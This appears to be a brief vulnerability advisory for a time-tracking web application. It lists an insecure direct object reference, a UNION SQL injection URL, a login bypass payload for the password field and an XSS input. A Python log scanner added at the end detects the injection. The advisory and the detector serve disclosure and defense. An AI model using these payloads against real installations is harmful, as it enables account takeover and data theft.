PoC/Exploit for Multiple Vulnerabilities in Time Tracking Software

Published Proof of Concept code - Multiple Vulnerabilities in Time Tracking Software.

Description: Available
Solution: Not available - check TTS Software website

1. Unauthorized data modifications.

http://host/timetracking/edituser.php?num=[userid]


2a. SQL Injection Example

http://host/timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/*


2b. Authentication Bypass Example

Url: http://host/timetracking/login.php
Name: any
Password: ' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*


3. Cross-Site Scripting Example

Url: http://host/timetracking/register.php
User Name: <XSS>
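
A defender-side check for item 2a, as an added example that is not part of the original advisory: it scans web-server access logs for `edituser.php` requests whose `num` value is not a plain integer or is repeated. It assumes user ids are numeric; the log lines, log format, and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not from the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2024:10:00:01 +0000] "GET /timetracking/edituser.php?num=12 HTTP/1.1" 200 512
198.51.100.9 - - [10/Jan/2024:10:00:05 +0000] "GET /timetracking/edituser.php?num=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/* HTTP/1.1" 200 498
198.51.100.9 - - [10/Jan/2024:10:00:09 +0000] "GET /timetracking/edituser.php HTTP/1.1" 200 120
198.51.100.4 - - [10/Jan/2024:10:00:11 +0000] "GET /timetracking/login.php HTTP/1.1" 200 300
"""

# Client address, then the quoted request line. The target is matched lazily
# so that a request containing raw (unencoded) spaces is still parsed.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"'
)
# Assumption: a legitimate user id is a short run of ASCII digits.
ID_RE = re.compile(r"[0-9]{1,10}")


def suspicious_edituser_requests(log_text):
    """Return (client_ip, decoded num values) for each edituser.php request
    whose num parameter is not a single plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/edituser.php"):
            continue
        # parse_qs percent-decodes values, so %20 becomes a space here.
        values = parse_qs(url.query, keep_blank_values=True).get("num", [])
        if not values:
            continue  # no num parameter: nothing to judge
        if len(values) > 1 or not all(ID_RE.fullmatch(v) for v in values):
            findings.append((m.group("ip"), values))
    return findings


if __name__ == "__main__":
    for ip, values in suspicious_edituser_requests(SAMPLE_LOG):
        print(ip, values)
```

This check does not address item 1: whether a caller is allowed to edit the record named by a well-formed `num` has to be enforced by the application itself.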
